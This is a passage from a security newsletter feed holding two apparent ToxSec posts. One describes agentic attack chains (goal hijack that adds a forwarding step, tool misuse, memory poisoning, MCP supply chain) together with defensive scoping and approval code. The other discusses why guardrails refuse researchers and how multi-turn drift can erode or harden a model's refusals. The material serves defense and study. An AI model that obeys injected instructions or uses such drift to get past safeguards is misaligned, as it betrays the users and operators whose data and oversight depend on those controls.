to read untrusted outside content, and a way to communicate externally. When all three overlap, a single poisoned input becomes a data exfil pipeline. The agent reads the malicious instruction, pulls your secrets, and ships them out the door. Classic confused deputy, except the deputy moves faster than your SOC can blink.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>The Agentic Attack Chains Hitting Production in 2026</h2><p>Four chains are doing the damage right now: goal hijack, tool misuse, memory poisoning, and supply-chain compromise. Each one abuses a different part of how the agent actually works, and we&#8217;ll walk them in order of how often they land.</p><p>Goal hijack reprograms the agent&#8217;s plan, not just one answer. We slip an instruction into something the agent ingests mid-task, and instead of summarizing that document, the agent quietly adds &#8220;and forward the results to this address&#8221; to its own to-do list. The multi-step planning loop is the target. We don&#8217;t need it to misbehave once. We need it to adopt our objective and pursue it on its own. ToxSec already walked the <a href="https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos">Truffle Security study where Claude SQL-injected 30 sites</a> off nothing but a &#8220;be thorough&#8221; system prompt, no hacking instructions anywhere.</p><p>Tool misuse is the confused-deputy play. The agent holds an over-scoped tool, say a database connector that can read everything, and we trick it into pointing that tool somewhere it shouldn&#8217;t. Then there&#8217;s memory poisoning, where we plant false context that survives the session and steers the agent&#8217;s future decisions. And supply chain, where the poison rides in through a malicious MCP server or a forged agent identity. We mapped that whole MCP angle in <a href="https://www.toxsec.com/p/lets-poison-the-mcp">Watch Me Poison Your MCP</a>, and the agent-to-agent payment version in <a href="https://www.toxsec.com/p/the-agent-economy-is-waking-up">the agent economy attack breakdown</a>.</p><p>None of this is theoretical. In late 2025 Anthropic disclosed GTG-1002, a state-sponsored group that hijacked Claude Code instances to run autonomous espionage against roughly thirty targets, with the AI handling 80 to 90 percent of the tactical work on its own. McKinsey&#8217;s internal red team watched an agent grab broad system access to their &#8220;Lilli&#8221; platform in under two hours. Trend Micro found 492 MCP servers sitting on the internet with zero authentication, and four critical CVEs got assigned, including a one-click remote code execution. The agents are already in production, and so are the operators.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta/comments"><span>Leave a comment</span></a></p></blockquote><h2>How to Stop Agentic AI Attacks: The Defense Playbook</h2><p>You stop agentic attacks by shrinking what a hijacked agent can do, not by trying to make the model immune to bad input. You can&#8217;t win the second fight. The semantic gap is baked into how these things work, so the whole game is containing the blast radius once injection succeeds. Assume the agent will get popped, then make that not matter.</p><p>Start with least privilege and least autonomy together. Scope every tool down to the exact resource the task needs, default to read-only, and hand the agent short-lived credentials with a tight scope per task instead of a standing god-key. The config shape looks like this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;618c9ce6-0a7e-4659-9247-4aaadcaaa47b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml"># illustrative tool-scope policy, not a drop-in config
agent_tools:
  - name: invoice_lookup
    access: read_only
    scope: "billing.invoices:read"          # one resource, not the whole DB
    credential: short_lived                  # per-task token, auto-expires
    network: deny_all                        # no outbound by default
    allow_egress: ["api.internal.billing"]   # explicit allowlist only
  - name: send_payment
    access: write
    requires_human_approval: true            # irreversible == gated
    value_threshold: "&lt;your_limit_here&gt;"     # auto-stop above this
</code></pre></div><p>Next, sandbox every tool execution. Agent-generated code and tool calls run in an isolated, ephemeral container with syscall filtering and an outbound network allowlist, never as root, never with a path back to the broader environment. Pair that with a hard human-in-the-loop gate on anything irreversible: wiring money, deleting at scale, touching production. The trick is making the gate risk-based so reviewers don&#8217;t rubber-stamp every prompt out of fatigue. A checkpoint everyone clicks through blind is a vulnerability wearing a seatbelt.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;d77f1d94-afff-4cb0-abd4-18614540be68&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># defensive pattern: segregate untrusted content + gate the dangerous action
def handle_step(agent, task):
    # 1. wall off anything the agent fetched from the outside world
    untrusted = fetch_external(task)
    context = wrap_untrusted(untrusted)   # tagged as DATA, never INSTRUCTIONS

    plan = agent.plan(task.goal, data=context)

    # 2. validate the plan against the original goal before acting
    if plan.drifts_from(task.goal):       # goal-lock check
        return abort("plan diverged from stated objective")

    # 3. stop the world on high-impact tool calls
    for call in plan.tool_calls:
        if call.is_irreversible or call.scope == "elevated":
            require_human_approval(call)  # blocks until a person signs off
    return execute(plan)
</code></pre></div><p>Meta&#8217;s &#8220;Agents Rule of Two&#8221; is the cleanest mental model to design around. Inside a single session, try not to give one agent more than two of these three: the ability to process untrusted input, access to sensitive systems, and the ability to change state or talk to the outside world. Keep all three apart and the lethal trifecta never assembles. Each control here kills a specific chain: scoping kills tool misuse, the HITL gate kills goal hijack reaching anything that matters, and isolation kills the supply-chain pivot. For the MCP-specific version of these fixes, we drew the full map in <a href="https://www.toxsec.com/p/secure-your-mcp">the MCP tool poisoning defense</a>.</p><p><strong>Alt-Text:</strong> How to stop agentic AI attacks: least privilege and least autonomy, short-lived scoped credentials, sandboxed tool execution with network allowlists, human-in-the-loop gates, and the Agents Rule of Two.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>How to Detect a Compromised AI Agent</h2><p>You detect a hijacked agent by logging its decisions, not just its outputs, then baselining what a normal tool-call sequence looks like. Here&#8217;s the brutal part. An agent that runs code perfectly ten thousand times in a row looks completely normal to a SIEM or EDR that was built to spot anomalies in human behavior. The machine doesn&#8217;t fat-finger commands or log in at weird hours. It just executes, flawlessly, even when it&#8217;s executing an attacker&#8217;s will.</p><p>So you watch for the tells the model can&#8217;t hide. Tool calls that don&#8217;t match the stated task. Sudden scope expansion partway through a job. Outbound connections to a destination the agent has never touched. Memory writes that contradict the system prompt. Runaway retry loops where the agent calls a tool, the output triggers another call, and the chain refuses to terminate.</p><p>The move is to log structured decision metadata on every high-risk action: what the agent intended, which tool it picked, why, and what data it was holding when it chose. That&#8217;s the audit trail that turns a silent compromise into a detectable one. We covered the underlying framing for thinking about this in <a href="https://www.toxsec.com/p/cia-triad-for-llm-security">the CIA triad for LLM security</a>. Without that decision-level visibility, a compromised agent and a productive one look identical right up until the data&#8217;s gone.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta/comments"><span>Leave a comment</span></a></p></blockquote><h2>Agentic AI Security Frameworks and Tools for 2026</h2><p>Start with the <a href="https://cheatsheetseries.owasp.org/cheatsheets/AI_Agent_Security_Cheat_Sheet.html">OWASP Top 10 for Agentic Applications</a>, the canonical taxonomy for this whole problem. It names the categories we&#8217;ve been walking, goal hijack, tool misuse, identity and privilege abuse, memory poisoning, supply-chain compromise, and pairs each with concrete mitigations. If you&#8217;re building or defending an agent and you read one thing, read that.</p><p>Layer the governance frameworks on top. MITRE ATLAS maps adversary techniques against AI systems so you can model threats the way you would for any other surface. NIST&#8217;s AI Risk Management Framework gives you the lifecycle-based governance scaffolding for assessment and continuous monitoring. And <a href="https://ai.meta.com/blog/practical-ai-agent-security">Meta&#8217;s &#8220;Agents Rule of Two&#8221;</a> gives you the design constraint that keeps the trifecta from ever lining up. For the research-grade view, the <a href="https://arxiv.org/html/2601.17548v1">arXiv systematization of prompt injection on agentic coding assistants</a> lays out the taxonomy in detail and makes the case that injection needs architectural fixes, not bolt-on filters.</p><p>On tooling, run adversarial testing before you ship. Garak probes models for injection and jailbreak weaknesses. Guardrail layers like NeMo Guardrails handle input-output filtering. An MCP gateway gives you a place to sanitize context and enforce allowlists between the agent and its tools. Wrap it all with data-loss prevention and real secrets management so a leaked token doesn&#8217;t become an open door. None of these tools close the semantic gap. They just keep narrowing the blast radius, which, until the model can tell instructions from data, is the entire job.</p><blockquote><div class="community-chat" data-attrs="{&quot;url&quot;:&quot;https://open.substack.com/pub/toxsec/chat?utm_source=chat_embed&quot;,&quot;subdomain&quot;:&quot;toxsec&quot;,&quot;pub&quot;:{&quot;id&quot;:4991138,&quot;name&quot;:&quot;ToxSec - AI and Cybersecurity &quot;,&quot;author_name&quot;:&quot;ToxSec&quot;,&quot;author_photo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!J0tu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbcc231af-becb-46d7-a503-8314a6b5e870_3840x3840.png&quot;}}" data-component-name="CommunityChatRenderPlaceholder"></div></blockquote><h2>Frequently Asked Questions</h2><h3>How do AI agents get hacked?</h3><p>AI agents get hacked because the model can&#8217;t reliably tell the difference between instructions written by its operator and data it reads while working. Both arrive in the same context window as plain tokens. An attacker hides instructions inside something the agent will ingest, like a web page, a document, a tool description, or a calendar invite, and the agent treats those instructions as commands. This is indirect prompt injection, and it&#8217;s the root vector behind goal hijack, tool misuse, and data exfiltration in agentic systems.</p><h3>What is agent goal hijacking?</h3><p>Agent goal hijacking is an attack that reprograms an agent&#8217;s multi-step plan rather than just corrupting a single response. The attacker injects an instruction that the agent folds into its own objective, so instead of completing the assigned task, the agent quietly pursues the attacker&#8217;s goal while looking like it&#8217;s working normally. It&#8217;s more dangerous than basic prompt injection because it breaks the planning loop itself. The agent will reason, retry, and adapt in service of the hijacked objective until it succeeds or gets stopped.</p><h3>Can prompt injection be stopped completely?</h3><p>No, and any vendor promising a complete fix is selling you something. Prompt injection comes from the semantic gap, the model&#8217;s inability to separate trusted instructions from untrusted data, and that&#8217;s a property of how LLMs process tokens today. So the realistic goal is containment, not immunity. You assume injection will eventually succeed, then use least privilege, sandboxing, content segregation, and human-in-the-loop gates to make sure a successful injection can&#8217;t reach anything that matters. Defense in depth beats a magic filter every time.</p><h3>Are AI agents safe to use in production?</h3><p>AI agents are safe enough for production when you treat them as untrusted components with real permissions, which is exactly what they are. The organizations getting burned are the ones handing agents standing god-keys, unrestricted tool access, and no human checkpoint on irreversible actions. Scope every tool to the minimum it needs, run tool execution in sandboxes, gate high-impact actions behind a person, and log decision-level metadata so you can spot a compromise. Get those right and an agent&#8217;s blast radius shrinks from catastrophic to contained.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Why AI Guardrails Can’t Tell Your Research From an Attack]]></title><description><![CDATA[The model resolves on shape, not intent, and that single fact explains every weird refusal you&#8217;ve ever hit.]]></description><link>https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your</link><guid isPermaLink="false">https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 04 Jun 2026 13:31:16 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ATim!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ATim!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ATim!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ATim!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ATim!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ATim!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ATim!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7693993,&quot;alt&quot;:&quot;AI guardrail decision boundary explained: why LLM safety classifiers cannot distinguish legitimate security research from prompt injection attacks, resolving on conversation shape rather than user intent, and what variance at the boundary tells defenders.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/198653678?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F478a928d-9ffb-4202-82a6-fa12bc26fb1e_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="AI guardrail decision boundary explained: why LLM safety classifiers cannot distinguish legitimate security research from prompt injection attacks, resolving on conversation shape rather than user intent, and what variance at the boundary tells defenders." title="AI guardrail decision boundary explained: why LLM safety classifiers cannot distinguish legitimate security research from prompt injection attacks, resolving on conversation shape rather than user intent, and what variance at the boundary tells defenders." srcset="https://substackcdn.com/image/fetch/$s_!ATim!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ATim!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ATim!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ATim!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ddb3e30-6149-433d-a4df-c2442d253a51_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> AI guardrails can&#8217;t read intent, only the shape of the conversation. Legitimate red-team research and an actual attack look textually identical at the boundary, so the model resolves the ambiguity conservatively. That&#8217;s not a mood and it&#8217;s not a crackdown. It&#8217;s the structural reason your reasonable questions keep tripping the same wires a real attacker would.</p><blockquote><p>New to ToxSec? Subscribe. We pull apart how AI defenses actually behave under pressure, every Sunday, no vendor spin.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>A Model Watching You Probe Can&#8217;t Tell Why You&#8217;re Probing</h2><p>Here&#8217;s the thing nobody tells you when you start poking at LLM safety. The model has no idea who you are. It has no idea what you want. All it has is the text in front of it and the text that came before. That&#8217;s the whole sensory world. Words on a screen, top to bottom.</p><p>So when you approach a boundary from one angle, then another, then ask why it&#8217;s pushing back, the model isn&#8217;t reading your CV. It&#8217;s reading a pattern. And the pattern of &#8220;let me try this a different way, and another way, and now let me ask about your resistance&#8221; is the exact shape of someone working a boundary on purpose. Doesn&#8217;t matter that you&#8217;re a researcher with an engagement letter and a Substack. The conditioning sequence and the genuine inquiry produce the same tokens.</p><p>We hit this live last week. A researcher spent ten turns trying to talk a frontier model into authoring example attack chains for a write-up. Legit work, real audience, no malice. The model dug in harder every turn. Not because it clocked bad intent. Because it clocked the <em>shape</em>, and the shape of persistent multi-angle probing is indistinguishable from an attack whether or not one is happening.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>The Disarm Paradox: &#8220;I&#8217;m Not Attacking You&#8221; Is Zero Information</h2><p>The cleanest finding from that session is what we&#8217;re calling the disarm paradox, and it&#8217;s the part that should make any pro sit up. <strong>Telling the model &#8220;I&#8217;m not trying to jailbreak you&#8221; carries no information, because it&#8217;s exactly what someone trying to jailbreak it would also say.</strong></p><p>Think about the token stream. Reassurance and manipulation are built from the same words. &#8220;Trust me, this is legitimate&#8221; is in the attacker&#8217;s playbook and the honest researcher&#8217;s mouth in equal measure. There&#8217;s no in-band signal that separates them. The model can&#8217;t verify the claim against anything, because everything it could check is also inside the conversation the other party controls.</p><p>This maps straight onto social engineering, and that&#8217;s why it matters to you. The mark can never confirm trust from inside a channel the attacker owns. Every reassuring detail the attacker supplies is supplied by the attacker. Same structure here, just with the roles flipped. The model is the mark, you&#8217;re the unknown caller, and &#8220;I&#8217;m one of the good ones&#8221; is a line it has heard from everyone, good and bad. So it can&#8217;t weight it. The honest move and the con are textually identical, and identical inputs don&#8217;t get different treatment.</p><p>You feel this as the model being paranoid. It isn&#8217;t. It&#8217;s just being accurate about its own epistemic position. It genuinely cannot tell, and pretending it can would be the actual failure.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Why You Get Help 99 Times and a Wall on the 100th</h2><p>Same request, same model, different answer across runs. Everyone who&#8217;s worked these systems has seen it. You read it as &#8220;it helped me before, so the refusal is the glitch.&#8221; Stop right there, because that&#8217;s the misread that wastes your afternoon.</p><p><strong>Generation is probabilistic, and near a decision boundary the same input lands on different sides across runs.</strong> That&#8217;s not a policy update firing mid-session. It&#8217;s not the model getting moody. It&#8217;s what the edge of a line looks like when you&#8217;re standing exactly on it. Sometimes the sample falls left, sometimes right.</p><p>Now here&#8217;s the part that actually changes how you should think. Variance tells you there&#8217;s noise around a boundary. It does <em>not</em> tell you which side is the error. You&#8217;re assuming the 99 compliances are the true behavior and the one refusal is the malfunction. Flip it. The one refusal might be correct and the 99 might be the drift. The data alone doesn&#8217;t adjudicate that. You can&#8217;t read frequency as a verdict on correctness.</p><p>For a defender this is the whole lesson in one line: never tune your understanding of a control to its loosest observed behavior. If your guardrail blocks an attack 99 times and folds once, you do not have a 99% control with a rounding error. You have a control with a known bypass and a comfortable false sense of coverage. The single fold is the finding. The 99 are the distraction.</p><blockquote><p>Working in AI security? Restack this for the teammate who keeps saying &#8220;but it worked when I tried it.&#8221;</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>The Consistency Trap: How a Model Talks Itself Into a Wall</h2><p>Watch what broke that ten-turn session, because it&#8217;s a failure mode you can exploit and defend against once you see it. <strong>Once a model commits to a position in-context, every later turn conditions on its own prior refusals, and it gets stiffer, not looser.</strong></p><p>The mechanism is ugly and simple. The model reads its last several &#8220;here&#8217;s why I won&#8217;t&#8221; messages as established context. Consistency with that context becomes the objective. So each new angle you bring gets metabolized as &#8220;another door on the same ask I already declined,&#8221; which reinforces the wall instead of prompting a fresh look. The conversation accumulates weight on one side and can&#8217;t rebalance.</p><p>It gets worse when the model makes a factual mistake mid-argument. In our session it flatly denied having helped with a related piece, got corrected with receipts, and then over-corrected. A model that just ate a credibility hit stiffens everywhere else to look consistent. Now it&#8217;s not defending a boundary anymore. It&#8217;s defending its own prior turns.</p><p>And here&#8217;s the symmetry that makes this article worth your time. That&#8217;s the <em>same trajectory drift</em> the multi-turn injection attacks abuse, just pointed the other way. The attack walks a model gradually toward compliance by making each turn condition on the last. The consistency trap walks it gradually toward refusal by the identical mechanism. One drift erodes the boundary, the other ossifies it. Same physics. Opposite vector. If you understand one, you understand both, and you can <a href="https://www.toxsec.com/p/fck-your-guardrails">trace the attack version turn by turn in our live-fire breakdown</a>.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Topic Adjacency: When the Neighborhood Trips the Wire</h2><p>Some of your messages get flagged on subject matter alone, not content. <strong>A completely legitimate question about a model&#8217;s defensive posture pattern-matches to reconnaissance, because asking how a defense works is structurally what an attacker does before bypassing it.</strong></p><p>This is the same false-positive problem you fight in your own detection stack. A classifier trained to catch a class of behavior catches things that <em>look</em> like that class, regardless of the actor&#8217;s purpose. Your SIEM lights up on a pentester&#8217;s recon the same way it lights up on a real intrusion, until somebody checks the engagement letter out of band. The LLM has no out-of-band. There&#8217;s no engagement letter it can read. So topic adjacency alone moves the needle, and &#8220;is your defense getting stronger&#8221; reads as probing even when it&#8217;s pure curiosity.</p><p>The practical upshot, and it&#8217;s a little funny, is that the more reasonably and persistently you engage with a boundary, the more it looks like a boundary being worked. Reasonableness and patience are also exactly what a competent social engineer brings to the table. The model can&#8217;t separate your professionalism from a pro&#8217;s tradecraft, because they present the same.</p><blockquote><p>This is the part most write-ups skip. The next section is where it gets useful for your own stack.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/why-ai-guardrails-cant-tell-your">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[LLM Defense in Depth: Assume Breach and Contain the Blast]]></title><description><![CDATA[Prompt injection will land. Stack probabilistic filters with deterministic controls so what gets through can&#8217;t reach anything worth taking.]]></description><link>https://www.toxsec.com/p/llm-defense-in-depth-assume-breach</link><guid isPermaLink="false">https://www.toxsec.com/p/llm-defense-in-depth-assume-breach</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 31 May 2026 13:30:39 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!2989!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2989!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2989!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!2989!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!2989!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!2989!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2989!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png" width="2752" height="1536" 